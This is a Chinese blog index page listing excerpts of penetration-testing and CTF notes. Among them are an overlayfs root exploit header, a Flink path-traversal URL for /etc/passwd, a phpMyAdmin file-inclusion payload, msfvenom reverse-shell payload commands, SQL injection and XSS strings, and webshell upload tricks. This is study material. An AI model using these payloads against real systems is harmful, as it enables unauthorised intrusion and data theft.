自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(104)
  • 收藏
  • 关注

原创 39166.c

/*just another overlayfs exploit, works on kernels before 2015-12-26# Exploit Title: overlayfs local root# Date: 2016-01-05# Exploit Author: rebel# Version: Ubuntu 14.04 LTS, 15.10 and more# Tested on: Ubuntu 14.04 LTS, 15.10# CVE : CVE-2015-8660.

2021-12-06 21:46:01 695

原创 POC_R

import requestsimport reimport sysimport urllib3from argparse import ArgumentParserimport threadpoolfrom urllib import parsefrom time import timeimport randomimport base64urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)filen.

2021-12-03 09:46:59 1054

原创 POC_ldop+++

# coding:utf-8 import requestsfrom lib.core.common import url_handle,get_random_uafrom lib.core.poc import POCBase# ...import urllib3urllib3.disable_warnings()class POC(POCBase): _info = { "author" : "hansi", # .

2021-11-25 10:12:54 1263

原创 POC+++++++

POC如下# coding:utf-8 import requestsfrom lib.core.common import url_handle,get_random_uafrom lib.core.poc import POCBase# ...import urllib3urllib3.disable_warnings()class POC(POCBase): _info = { "author" : "jijue", .

2021-11-24 20:17:43 1037

原创 POC+++++

# coding:utf-8 import requestsfrom lib.core.common import url_handle,get_random_uafrom lib.core.poc import POCBase# ...import urllib3urllib3.disable_warnings()class POC(POCBase): _info = { "author" : "jijue", #...

2021-08-27 18:36:00 582

原创 PHP反序列化漏洞

参考:https://cnblogs.com/xiaoqiyue/p/10951836.htmlhttps://www.jb51.net/article/188446.htm什么是序列化和反序列化?序列化是将变量转换为可保存或传输的字符串的过程;反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。为什么要序列化?更好的将数组或者是对象存储到文件或数据库中注意: php序列化的...

2021-05-08 16:12:00 121

原创 常见网络安全设备弱口令

https://mp.weixin.qq.com/s?__biz=MzU3MDk3MTU2MQ==&mid=2247483790&idx=1&sn=b21061ab1fc530418f6d00796b789de2&chksm=fce60548cb918c5e603c438726087759d11f45b3e97c5914c2f657a3d9fc3fb5ce2d90...

2021-03-09 11:38:00 509

原创 python 开启http服务

Python <=2.3python-c"import SimpleHTTPServer as s; s.test();"8000Python >=2.4python-mSimpleHTTPServer8000Python3.xpython-mhttp.server8000

2021-03-05 10:46:00 140

原创 python快速查看内置模块函数

Python设计语言如何查看自带的模块的方法和属性?其中,它有内置函数dir(),需要查看什么模块,首先导入该模块,然后调用函数dir()。1.通用的帮助函数help()  使用help()函数来查看函数的帮助信息。  如:1 import requests2 3 help(requests)  会有类似如下输出:2.查询函数信息  ★查看模块下的所有函数:dir...

2021-02-23 20:19:00 838

原创 为什么我建议你卸载"抖音"?

无意中读到的一片文章-----最近读到一篇极好的文章《为什么我建议你卸载“抖音”?》,来自于微信公众号“经管世界”2018-05-14期,读完发人省醒。 抖音这个软件有毒 。当一个人在潜意识里控制不了自己的时候是最可怕的,尼尔·波兹曼在《娱乐至死》中说到:“人类无声无息地成为娱乐的附庸,毫无怨言,甚至心甘情愿,其结果是我们成了一个娱乐至死的物种。”其实不止抖音,现在很多事,看...

2021-02-18 17:33:00 1334 1

原创 Apache Flink目录遍历漏洞

fofa语法搜索app="Apache-Flink"poc:http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd读取成功

2021-01-07 19:40:00 301

原创 Centos7安装docker和docker-compose

1.安装docker# 使用yum安装dockeryum -y install docker# 启动systemctl start docker.service# 设置为开机自启动systemctl enable docker.service2.安装docker-compose# 下载docker-composesudo curl -L "https://github...

2020-12-31 08:47:00 142

原创 php fopen函数

php中没有单独的文件创建函数,如果我们想创建函数,可以使用fopen(),fopen()函数字面意思是打开文件,但该函数也有创建文件的功能,当使用 fopen() 函数打开一个文件时,如果文件不存在,则会尝试创建该文件,并返回一个资源。php fopen函数介绍fopen函数打开文件或者 URL语法:resource fopen( string filename, string...

2020-12-25 20:22:00 397

原创 linux动态查看mysql日志

第一步:使用下面的命令打开mysql的配置文件,去除68,69行的注释,然后保存。sudo vi /etc/mysql/mysql.conf.d/mysqld.cnf第二步:重启mysql服务,就会产生mysql日志文件。sudo service mysql restart额外:MySQL的日志文件所在的位置/var/log/mysql/mysql.log # ...

2020-12-25 09:05:00 965

原创 msfvenom常用payload

payload命令windows:msfvenom-a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exemac:msfvenom-...

2020-12-24 21:31:00 409

原创 msf常用payload

msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:msfvenom -l生成二进制文件关于二进制文件,主要介绍适用于Window...

2020-12-24 20:16:00 3526 1

原创 linux tmux基本操作

无意中发现了这个工具,感觉蛮好用的,哈哈基本操作新建会话:tmux new -s session-name查看会话:tmux ls进入会话:tmux a -t session-name断开会话:tmux detach关闭会话:tmux kill-session -t session-name快捷键输入命令tmux使用工具 上下分屏:ctrl + b 再按 " 左右分...

2020-12-24 14:50:00 121

原创 URL编码表

%25=%%3f=?

2020-12-23 18:43:00 94

原创 BUUCTF-[GWCTF 2019]我有一个数据库 1

phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞影响版本:4.8.0——4.8.1payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd本题payload:/phpmyadmin/?target=db_datadict.php%253f/../../.....

2020-12-23 18:40:00 248

原创 BUUCTF-[ACTF2020 新生赛]Include 1

本题主要考查了利用php://filter伪协议进行文件包含进入题目根据Tip进入正题,可以看到URL中存在文件包含(题目名也很直接)首先考虑"php://input"伪协议 + POST发送PHP代码的经典套路重新考虑之后使用"php://filter"伪协议"来进行包含。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码...

2020-12-23 17:02:00 232 1

原创 BUUCTF-[极客大挑战 2019]BabySQL 1

题目考察了字符绕过,注释符绕过,sql双写绕过http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 order by 3%23&password=admin .可以看到or和by关键字被过滤尝试双写绕过http://7738142d-0bba-4e...

2020-12-19 19:54:00 215 1

原创 BUUCTF-[SUCTF 2019]EasySQL 1

好吧这题是我不配 看了网上大佬的WPpayload1:*,1 大佬的解法,好像直接将源码猜出来了 select $_GET['query'] || flag from flagpayload2:select1;setsql_mode=pipes_as_concat;select1||flagfromFlagpayload3:1;set sql_mode=PIPES_AS_...

2020-12-19 16:48:00 209 1

原创 BUUCTF-[极客大挑战 2019]LoveSQL 1

万能密码登入尝试解密MD5,解密失败尝试其他注入思路http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.node3.buuoj.cn/check.php?username=admin' order by 3%23&password=123 有回显http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.n...

2020-12-19 15:42:00 135 1

原创 BUUCTF-[极客大挑战 2019]HardSQL 1

使用updatexml报错法注入http://1bfb9fee-1fce-4f07-81b1-c8048e473a66.node3.buuoj.cn/check.php?username=admin'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21http://1bfb9fee-1fce-4f07-81...

2020-12-19 14:29:00 156 1

原创 CTFHUB-Injection V2.0

拿到题目登录框这里了解一下登录框的两种查询模式一种是直接对用户输入的账号名和密码进行查询$username=$_POST['username'];$password=$_POST['password'];$sql='select * from user where username='$username' and password='$password'';#查询#登陆...

2020-12-18 19:40:00 363 2

原创 SQL注入中登录框只验证用户名情况下的绕过

思路:通过向数据库添加可控数据方法一:使用union select 1,2,3union select 语句会向数据库添加一条虚拟数据方法二:使用group by 字段 with rollup引用:group by将结果集中的数据行根据选择列的值进行逻辑分组group by 后可以跟with rollup,表示在进行分组统计的基础上再次进行汇总统计参考:https://w...

2020-12-18 19:12:00 301 1

原创 文件上传绕过姿势基础篇

文件上传绕过按照上传位置分为客户端和服务端按照上传类型分为黑名单和白名单黑名单绕过包括1、上传特殊可解析后缀 2、上传.htaccess (内容: SetHandler application/x-httpd-php 将之后上传的文件全部解析为php文件) 3、后缀大小写绕过 (PHP,ASP.等) ...

2020-12-17 15:35:00 178

原创 php伪协议实现命令执行的七种姿势(转)

首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file,计划对文件包含漏洞与php封装协议的利用方法进行总结,本篇先总结下一些封装协议,涉及的相关协议:file://、php://filter...

2020-12-17 09:57:00 148

原创 php文件包含+伪协议+文件上传漏洞利用实例(转)

1.上传文件过滤了后缀名和MIME类型,$_FILES['pic']['type']是由浏览器传输的文件类型决定,但是mime_content_type()是由php内置方法判断文件类型; 支持文件类型为application/zip,支持上传zip压缩文件,后缀名还是要改成.jpg或.gif,上传后将该名为随机数字(1499394959).jpg格式 $name...

2020-12-17 08:46:00 208

原创 CTFHUB-文件包含

思路:利用文件包含执行shell.txt文件,以拿到shellhttp://challenge-4b90ab5ce47f595f.sandbox.ctfhub.com:10080/?file=shell.txt点开shell文件拿到flagctfhub{869c02e49095087b467fdba8}...

2020-12-16 09:32:00 211

原创 CTFHUB-文件上传之00截断

上传bp抓包php 5.2版本的00截断,应该在上传路径截断访问 http://challenge-c93b95717911341d.sandbox.ctfhub.com:10080/upload/5.php蚁键连接

2020-12-15 11:18:00 963

原创 CTFHUB-文件上传之文件头绕过

在小马前添加文件头bp抓包,Content-Type类型修改为image/gif蚁键连接

2020-12-15 11:07:00 514

原创 图片马制作

方法一准备一张图片1.jpg,准备一句话php木马1.php通过控制台cmd命令制造图片马进入两个文件的文件夹打开控制台输入命令:命令解释:使用CMD制作一句话木马。参数/b指定以二进制格式复制、合并文件; 用于图像类/声音类文件参数/a指定以ASCII格式复制、合并文件。用于txt等文档类文件copy 1.jpg/b+1.php 2.j...

2020-12-15 09:53:00 269

原创 CTFHUB-文件上传之MIME绕过

1.MIME-Type介绍MIME(multipurpose Internet mail extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。2.burp绕过MIME-Type验证在上传时使用burp截断ht...

2020-12-15 09:42:00 945

原创 CTFHUB-文件上传之.htaccess文件利用

网上找了一下什么是.htaccess文件首先我们先上传一个.htaccess文件,文件内容如下SetHandler application/x-httpd-php这段内容的作用是使所有的文件都会被解析为php文件这里上传一个jpg文件,内容为一句话木马蚁键连接,获得webshell...

2020-12-15 09:28:00 454

原创 Pass-02

和第一关一样,唯一就是注意有闭合和注释符id=1' and 1=1--+id=1' order by 3--+爆列id=1' and 1=2 union select 1,2,3--+ 2,3位置回显id=1' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.sch...

2020-12-14 21:08:00 89

原创 URL连接符

+   URL 中+号表示空格%2B空格  URL中的空格可以用+号或者编码 %20/   分隔目录和子目录 %2F?    分隔实际的URL和参数 %3F%    指定特殊字符 ...

2020-12-07 09:29:51 594

原创 XSS Cheat Sheet

XSS Cheat Sheet本文只发在Mannix基佬群和先知社区,非原创,实为整理所得,如果不喜欢,请点击左上角叉号关闭本页。XSS 101<h1>Hello,<script>alert(1)</script>!</h1>1. With <script> tag<script>alert(1)</script>2. With regular HTML tags2.1 Event-based<TAG

2020-12-02 19:27:40 6606

原创 文件上传绕过姿势补充

绕过姿势客户端绕过(抓包改包)• 服务端绕过 • 文件类型• 文件头 • 文件后缀名• 配合文件包含漏洞绕过• 配合服务器解析漏洞绕过• CMS、编辑器漏洞绕过• 配合操作系统文件命名规则绕过 这里只针对自己不太熟悉和使用的一些姿势进行解释。1. 通过服务器解析针对早期版本安全狗,可以多加一个filename或者将filename换位置,在IIS6.0下如果我们将filename放在如下位置2.配合文件包含漏洞前提:校验规则只校验当文件后缀名...

2020-12-02 15:10:33 165

原创 sqlmap 思维导图

2020-11-25 18:45:39 230

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除